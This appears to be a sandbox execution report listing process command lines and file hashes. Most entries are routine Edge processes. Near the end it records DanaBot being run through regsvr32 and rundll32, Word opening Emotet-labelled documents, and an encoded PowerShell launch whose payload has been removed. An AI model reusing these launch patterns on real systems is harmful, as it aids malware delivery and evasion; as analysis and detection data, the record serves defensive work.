C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6096,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6008 /prefetch:8

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\PrismLauncher-Windows-MSVC-arm64-9.4\qtlogging.ini

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1688,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6440 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5460,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5596 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=872,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5020 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6464,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6468 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=6032,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=5792,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5024,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=3728,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5104 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=5268,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6836 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6752,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7128 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=3536,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=4864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5400,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6812 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1800,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6328 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=7180,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6328 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5088,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6900 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7228,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6884 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6856,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6848 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6928,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5412 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3516,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7068 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7012,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=6936 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7248,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7132 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=3632,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7148 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=7308,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=1472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=7316,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=7536,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=5408,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7800 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=7948,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7900 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=7724,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=8068 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7548,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=8752 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x300 0x508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7852,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7856 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=7888,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=8700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=7860,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7816 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=7872,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7280 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=7940,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5112 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=3560,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=8452,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=8944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=9144,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=7652,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7632 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=8024,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=9188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --always-read-main-dll --field-trial-handle=8460,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=9364,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=7660 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8436,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=9456 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9528,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=9596 /prefetch:8

C:\Users\Admin\Downloads\DanaBot.exe

"C:\Users\Admin\Downloads\DanaBot.exe"

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@5068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5068 -ip 5068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 456

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=9760,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=9576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7904,i,2332713971509396723,4034040263632807597,262144 --variations-seed-version --mojo-platform-channel-handle=9224 /prefetch:8

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\Emotet\[email protected]" /o ""

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\Emotet\[email protected]" /o ""

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -enco [encoded command removed]

Network

Country Destination Domain Proto

Files

\??\pipe\crashpad_5616_FRDDXBOJTOFHYLTW


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports


C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe583534.TMP


C:\Users\Admin\Downloads\PrismLauncher-Windows-MSVC-arm64-9.4.zip.crdownload


C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 5b8fbfc83c599f8b99356da67dc40c5f
SHA1 ce5175de5fb93367b1bc38e97f44a49a2aa04be6
SHA256 9db7c9d0b3458b55bc478b27c587414980d418b5140a23075227f6480b3fd060
SHA512 3a17b67edcb785ef8d53935e6071b529c42b6b982aab6da7c88dc488762acbdf9a401e8e4f972935a6452fb843ca076e1ac9bfc53ce8078338e195c3c71ab9b8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 040d887169a8444d34fdb06589b624bf
SHA1 24a88363a655ded0072e4788ae0fd5d8a3418b76
SHA256 39ebc96a33663f628711950bccd503f56333598db514e2a619bee60daf44d8a2
SHA512 ca4dbc1517c8a16b10fe9574868a8c058d6ff54fb9eee38ec3c32424d820717821a8e4672b6d15b9b61dc212414d709c80835bd937ee8f422497864c4f5b6f23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

MD5 41c1930548d8b99ff1dbb64ba7fecb3d
SHA1 d8acfeaf7c74e2b289be37687f886f50c01d4f2f
SHA256 16cee17a989167242dd7ee2755721e357dd23bcfcb61f5789cc19deafe7ca502
SHA512 a684d61324c71ac15f3a907788ab2150f61e7e2b2bf13ca08c14e9822b22336d0d45d9ff2a2a145aa7321d28d6b71408f9515131f8a1bd9f4927b105e6471b75

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

MD5 cb8d037cc82c084fc11384003abb4aae
SHA1 f6a18abbcddca906ff06deefd65d6b5541795d64
SHA256 48c2b307b350c47bc925e0ad5d60dd2ad061e26a6553fb8e45fb3fe907d21085
SHA512 cb6d329f1cc99f64f215dd226a1199f911a20fe2cfc36e4b7932d29d9bb64a22242bee5506dc840577bc795553d8f2df65d161ab9a68729a606426d476e93e8f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a537f3ad27d913f47bc03aab3930db86
SHA1 36d4f584cf2c1fc822acf7fd87762497af20adad
SHA256 4e6e7062c6e5269115f16d609f6c029ab4c4279c22a8de58c78947ab4b1727bb
SHA512 a80cd9ba086f215847633cb0f132ccf7ca2414b64534ed4ecffadb6ba19f46e6912956bc4980946952df0678ceda846283049ca4ded257349277c314bda156dc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5a7eb2166b88344214e7f1f6d93a0af7
SHA1 c2fc9a79fed9d8846b9d367af42b27836b6a0165
SHA256 ba664a7e00684be1596aa474469def113f2593926d0a846ab53f6025b9d5b483
SHA512 0a012467be41cf12a63afc982a6c328597c6ca3f557e27544920f30972e16b63c864d19c39f069ffc73ddf1dafd153e2edcb1e3f7c48ec71f36d8307351133ad

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 03ff1423a3292d842b25a12b9b887316
SHA1 d820a72e44ab65ffddd50523de6710ffd549606c
SHA256 c9c1040165f6c35a8b959d5f7fdce83b8f89595d45099333220b471c24ca8de8
SHA512 036eb4ef0dcf52954878d765bd63aab96f24896b9014d466f2dc45a1969977e8ad876bc742b0343e7b093ec814357d38b0aad2e0ca215b486d1ac87c87a72647

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_780230892\manifest.json

MD5 049c307f30407da557545d34db8ced16
SHA1 f10b86ebfe8d30d0dc36210939ca7fa7a819d494
SHA256 c36944790c4a1fa2f2acec5f7809a4d6689ecb7fb3b2f19c831c9adb4e17fc54
SHA512 14f04e768956bdd9634f6a172104f2b630e2eeada2f73b9a249be2ec707f4a47ff60f2f700005ca95addd838db9438ad560e5136a10ed32df1d304d65f445780

C:\Program Files\chrome_Unpacker_BeginUnzipping5616_780230892\manifest.fingerprint

MD5 496b05677135db1c74d82f948538c21c
SHA1 e736e675ca5195b5fc16e59fb7de582437fb9f9a
SHA256 df55a9464ee22a0f860c0f3b4a75ec62471d37b4d8cb7a0e460eef98cb83ebe7
SHA512 8bd1b683e24a8c8c03b0bc041288296448f799a6f431bacbd62cb33e621672991141c7151d9424ad60ab65a7a6a30298243b8b71d281f9e99b8abb79fe16bd3c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.9\protocols.json

MD5 f9fd82b572ef4ce41a3d1075acc52d22
SHA1 fdded5eef95391be440cc15f84ded0480c0141e3
SHA256 5f21978e992a53ebd9c138cb5391c481def7769e3525c586a8a94f276b3cd8d6
SHA512 17084cc74462310a608355fbeafa8b51f295fb5fd067dfc641e752e69b1ee4ffba0e9eafa263aab67daab780b9b6be370dd3b54dd4ba8426ab499e50ff5c7339

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ed864600dcf210f2de9ab4104284d3b7
SHA1 548e6b72723379d525dceda12458317f1fd0341e
SHA256 d9c780a4884e3d644f18c395b0e07029b8d5ba0db2a5326efb345690b093feb8
